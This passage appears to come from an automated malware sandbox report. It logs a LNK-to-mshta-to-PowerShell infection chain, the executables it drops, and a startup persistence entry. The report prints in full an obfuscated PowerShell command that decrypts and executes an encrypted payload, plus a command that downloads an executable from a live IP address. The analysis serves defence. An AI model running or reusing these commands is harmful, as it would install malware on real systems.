Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
Source: C:\Users\Public\Guard.exeSection loaded: wsock32.dll
Source: C:\Users\Public\Guard.exeSection loaded: version.dll
Source: C:\Users\Public\Guard.exeSection loaded: winmm.dll
Source: C:\Users\Public\Guard.exeSection loaded: mpr.dll
Source: C:\Users\Public\Guard.exeSection loaded: wininet.dll
Source: C:\Users\Public\Guard.exeSection loaded: iphlpapi.dll
Source: C:\Users\Public\Guard.exeSection loaded: userenv.dll
Source: C:\Users\Public\Guard.exeSection loaded: uxtheme.dll
Source: C:\Users\Public\Guard.exeSection loaded: kernel.appcore.dll
Source: C:\Users\Public\Guard.exeSection loaded: windows.storage.dll
Source: C:\Users\Public\Guard.exeSection loaded: wldp.dll
Source: C:\Users\Public\Guard.exeSection loaded: napinsp.dll
Source: C:\Users\Public\Guard.exeSection loaded: pnrpnsp.dll
Source: C:\Users\Public\Guard.exeSection loaded: wshbth.dll
Source: C:\Users\Public\Guard.exeSection loaded: nlaapi.dll
Source: C:\Users\Public\Guard.exeSection loaded: mswsock.dll
Source: C:\Users\Public\Guard.exeSection loaded: dnsapi.dll
Source: C:\Users\Public\Guard.exeSection loaded: winrnr.dll
Source: C:\Users\Public\Guard.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: twext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cscui.dll
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: version.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: mpr.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wininet.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: rasadhlp.dll
Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: s4PymYGgSh.lnkLNK file: ..\..\..\Windows\System32\forfiles.exe
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: dvdplay.pdbGCTL source: mshta.exe, 00000004.00000003.1714402239.000002CACB9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1706852595.000002CACBA07000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1712006221.000002CACB968000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1719000851.000002CACB96B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1714402239.000002CACB9F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1715259161.000002CAD10B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1712160609.000002CACBA07000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1711638067.000002CACB96F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1706321294.000002CAD10A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1714047185.000002CACB9EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1714715303.000002CACB96B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1706852595.000002CACB9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1718910740.000002CACBA07000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1721670711.000002CACBA07000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1719380903.000002CACB964000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1706321294.000002CAD10B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1712238556.000002CACB9EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1712605510.000002CACBA1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1712037269.000002CACBA0C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1720950548.000002CACB965000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1722420366.000002CAD10A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1722010344.000002CACBA1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1712103472.000002CACBA17000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1707406806.000002CACB9FA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dvdplay.pdb source: mshta.exe, 00000004.00000003.1712006221.000002CACB968000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1719000851.000002CACB96B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1714402239.000002CACB9F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1715259161.000002CAD10B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1711638067.000002CACB96F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1714047185.000002CACB9EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1714715303.000002CACB96B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1706852595.000002CACB9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1706321294.000002CAD10B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1712238556.000002CACB9EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1707406806.000002CACB9FA000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($VGARXd){return -split ($VGARXd -replace '..', '0x$& ')};$DLBqcOk = clean('00952E0EAAA369CB7EDA094FDAAD548DC7EBBE105E37D3A4DD5A7D2DC3C7BDB28C06949289913AE18AFF4985AC0A4A425F444A5427F4855F02DC192D92C9D059910F5326B551C1FBE3BD556C61D517FD26BB0DDA113550D575D28F8A6103693337BF9498AB6F862E4DA5E000AA791D9AA38BFFDF638AEFEB44FA353B1BBC79C0B8F3F039BBFB473DBE5A2163C5297FEA3B449744B787BFD5E3D2D2DC793FA3D42573446DB8C1522E13A7696F37E5C6DFB4339D6F312DA4F7AC3F7F8A272A1C7E6D46C705DC9106ADB9D2690AD45F178F68F3F96535F494B1C112A90293671FCF3A99B408B224F36FEDB31BC4BE9660AB3338DC0571CC95E4819A641F1E63F34EEA383DA81507A9460D2F793F27C40F0BE3CDC495923F94F572D7CC36F0F9BC192B64FFF1EA68FF6DF1267E85703F7CE3A1B2B369CB69B382FA5E5414694A7FAC82DB7EF1CD63E7D0DB286788C22BE423741CE14EED86328E5B0A1B5E6015C081B9ADC5584B188904C72FB7809947462ABB46B4411C8F7467776C4CF5E6DE4A125B51E141F5F377DC69A3A551F363C5B92C853BD07B17D6A6D22B1BB2125B1DAA5AEB4779F820FD87D3A473D74F813C3D317EDD4CA7364858BE4EF1A199CF0CCE68623CFCC2DAE619884748B0669842ADD109C7C2D3C94C5E60D3734508294BF013972C272FD970EC7823EEF4EC60519B53B7CB23D4B5AB2A35FFDA992A39E95A2EA920D0A343160707DD5A2D29AE6EF568D25D354BAD060EEB2312EFC70E382228038F6E3AAFBE6DA3F033EC03FCFAC2E6474AA92901C29C7E935F0EF9256603E50E9AE54F28C64EB0B62541C16C81B31F123EB1F62AA075030DF335F2F233B1D0572DB1344253CB16FC57D50EA0FEC5F117610698B3981E1FE1037593D2F25954CEB7AA7476166501E6E91201EA06DCEA504BF1755984B1EB672A8368994F7FC4C67586ED78251A2F06F39283D3DE14A0B398BD25B7578AD0901A36303C6EEAE780BD3A96D106C54D28D9174422CFC0C12EED237BB3D9D8B8C0BEF9DE95A209C8CC66E2B538F79DDAF3183835A0F7F6694A40776335E75BDECD48A839EC0682B59CFA1D33BB11A349DDBB588B3F645CB31E55E0AB2543363E815610EB013DEB7CE8EC26A913B7BEF508C1825E8C10EB3320C2D1CE31D968F2E47C293CD02C39B499523127D609CCD06DC157D6D2B498A34CF14B0E20BF6BC402B4A171A623AF24253354BF256B06B278DBBE05F05B405CAA69A5B27D9635119927475C932D7E26F612B9A6119E0DA2D95273F043B8BF88A54B8C708E55E08264CBA9B31BE5DF8578C4F53770C16C752FFC20FF1177103B4E88CB671AD1E8922D66CED32F4A427EA0E9009B24EE692A0DF6E540DDA0214C6CED115113D1DE60DB67E356E2FA9994FEE2C1D1BB4C9EFCC878383644915EAE6C54AB94C50C12CF86B0105A8EF91D6ABC4C61CDFB58006AC5F6D6B39AB88817B83AB53CE4965B39228AF37E6A49E5392F23C9553BCF4075260DF9B4FE20DB589FB4EA5567B6AE3A73FA2FA7C96B3C25C044D663A965CC679968E22349FD362344D3981B8482F16667D5829063A00F894C03FC9CC5753DD640CC66AB7B73D992518CF818B20CE25E63E80DE29C8CB1804C28C38743BBA0ABCEE4631FB8ECE9886E143AC598E0CFF0E0EDF7EB943C8A');$fgNcqNX = [System.Security.Cryptography.Aes]::Create();$fgNcqNX.Key = clean('764F4D5163617754716D4B6C6E447878');$fgNcqNX.IV = New-Object byte[] 16;$ckcAaXbLZ = $fgNcqNX.CreateDecryptor();$lGOPfxpiP = [Text.Encoding]::UTF8.GetString($ckcAaXbLZ.TransformFinalBlock($DLBqcOk, 0,$DLBqcOk.Length)); & $lGOPfxpiP.Substring(0,3) $lGOPfxpiP.Substring(3)
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/hvshp" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($VGARXd){return -split ($VGARXd -replace '..', '0x$& ')};$DLBqcOk = clean('00952E0EAAA369CB7EDA094FDAAD548DC7EBBE105E37D3A4DD5A7D2DC3C7BDB28C06949289913AE18AFF4985AC0A4A425F444A5427F4855F02DC192D92C9D059910F5326B551C1FBE3BD556C61D517FD26BB0DDA113550D575D28F8A6103693337BF9498AB6F862E4DA5E000AA791D9AA38BFFDF638AEFEB44FA353B1BBC79C0B8F3F039BBFB473DBE5A2163C5297FEA3B449744B787BFD5E3D2D2DC793FA3D42573446DB8C1522E13A7696F37E5C6DFB4339D6F312DA4F7AC3F7F8A272A1C7E6D46C705DC9106ADB9D2690AD45F178F68F3F96535F494B1C112A90293671FCF3A99B408B224F36FEDB31BC4BE9660AB3338DC0571CC95E4819A641F1E63F34EEA383DA81507A9460D2F793F27C40F0BE3CDC495923F94F572D7CC36F0F9BC192B64FFF1EA68FF6DF1267E85703F7CE3A1B2B369CB69B382FA5E5414694A7FAC82DB7EF1CD63E7D0DB286788C22BE423741CE14EED86328E5B0A1B5E6015C081B9ADC5584B188904C72FB7809947462ABB46B4411C8F7467776C4CF5E6DE4A125B51E141F5F377DC69A3A551F363C5B92C853BD07B17D6A6D22B1BB2125B1DAA5AEB4779F820FD87D3A473D74F813C3D317EDD4CA7364858BE4EF1A199CF0CCE68623CFCC2DAE619884748B0669842ADD109C7C2D3C94C5E60D3734508294BF013972C272FD970EC7823EEF4EC60519B53B7CB23D4B5AB2A35FFDA992A39E95A2EA920D0A343160707DD5A2D29AE6EF568D25D354BAD060EEB2312EFC70E382228038F6E3AAFBE6DA3F033EC03FCFAC2E6474AA92901C29C7E935F0EF9256603E50E9AE54F28C64EB0B62541C16C81B31F123EB1F62AA075030DF335F2F233B1D0572DB1344253CB16FC57D50EA0FEC5F117610698B3981E1FE1037593D2F25954CEB7AA7476166501E6E91201EA06DCEA504BF1755984B1EB672A8368994F7FC4C67586ED78251A2F06F39283D3DE14A0B398BD25B7578AD0901A36303C6EEAE780BD3A96D106C54D28D9174422CFC0C12EED237BB3D9D8B8C0BEF9DE95A209C8CC66E2B538F79DDAF3183835A0F7F6694A40776335E75BDECD48A839EC0682B59CFA1D33BB11A349DDBB588B3F645CB31E55E0AB2543363E815610EB013DEB7CE8EC26A913B7BEF508C1825E8C10EB3320C2D1CE31D968F2E47C293CD02C39B499523127D609CCD06DC157D6D2B498A34CF14B0E20BF6BC402B4A171A623AF24253354BF256B06B278DBBE05F05B405CAA69A5B27D9635119927475C932D7E26F612B9A6119E0DA2D95273F043B8BF88A54B8C708E55E08264CBA9B31BE5DF8578C4F53770C16C752FFC20FF1177103B4E88CB671AD1E8922D66CED32F4A427EA0E9009B24EE692A0DF6E540DDA0214C6CED115113D1DE60DB67E356E2FA9994FEE2C1D1BB4C9EFCC878383644915EAE6C54AB94C50C12CF86B0105A8EF91D6ABC4C61CDFB58006AC5F6D6B39AB88817B83AB53CE4965B39228AF37E6A49E5392F23C9553BCF4075260DF9B4FE20DB589FB4EA5567B6AE3A73FA2FA7C96B3C25C044D663A965CC679968E22349FD362344D3981B8482F16667D5829063A00F894C03FC9CC5753DD640CC66AB7B73D992518CF818B20CE25E63E80DE29C8CB1804C28C38743BBA0ABCEE4631FB8ECE9886E143AC598E0CFF0E0EDF7EB943C8A');$fgNcqNX = [System.Security.Cryptography.Aes]::Create();$fgNcqNX.Key = clean('764F4D5163617754716D4B6C6E447878');$fgNcqNX.IV = New-Object byte[] 16;$ckcAaXbLZ = $fgNcqNX.CreateDecryptor();$lGOPfxpiP = [Text.Encoding]::UTF8.GetString($ckcAaXbLZ.TransformFinalBlock($DLBqcOk, 0,$DLBqcOk.Length)); & $lGOPfxpiP.Substring(0,3) $lGOPfxpiP.Substring(3)Jump to behavior
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/hvshp" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D036D1C LoadLibraryA,GetProcAddress,14_2_00007FF74D036D1C
Source: duydemo[1].4.drStatic PE information: real checksum: 0x5f0d should be: 0x1cb85
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFAAB0C55D8 push eax; iretd 7_2_00007FFAAB0C5671
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0678FD push rdi; ret 14_2_00007FF74D067904
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D067399 push rdi; ret 14_2_00007FF74D0673A2
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A48B75 push ecx; ret 21_2_00A48B88
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F38B75 push ecx; ret 27_2_00F38B88

Persistence and Installation Behavior

barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\mshta.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\mshta.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exe
Drops PE files with a suspicious file extension
Source: C:\Users\Public\Guard.exeFile created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifJump to dropped file
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\duydemo[1]Jump to dropped file
Source: C:\Users\Public\Guard.exeFile created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\BFmcYQ.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\duydemo[1]Jump to dropped file

Boot Survival

barindex
Drops PE files to the user root directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D054514 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,14_2_00007FF74D054514
Source: C:\Users\Public\Guard.exeCode function: 21_2_00AA59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,21_2_00AA59B3
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A35EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,21_2_00A35EDA
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F959B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,27_2_00F959B3
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F25EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,27_2_00F25EDA
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A433B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,21_2_00A433B7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
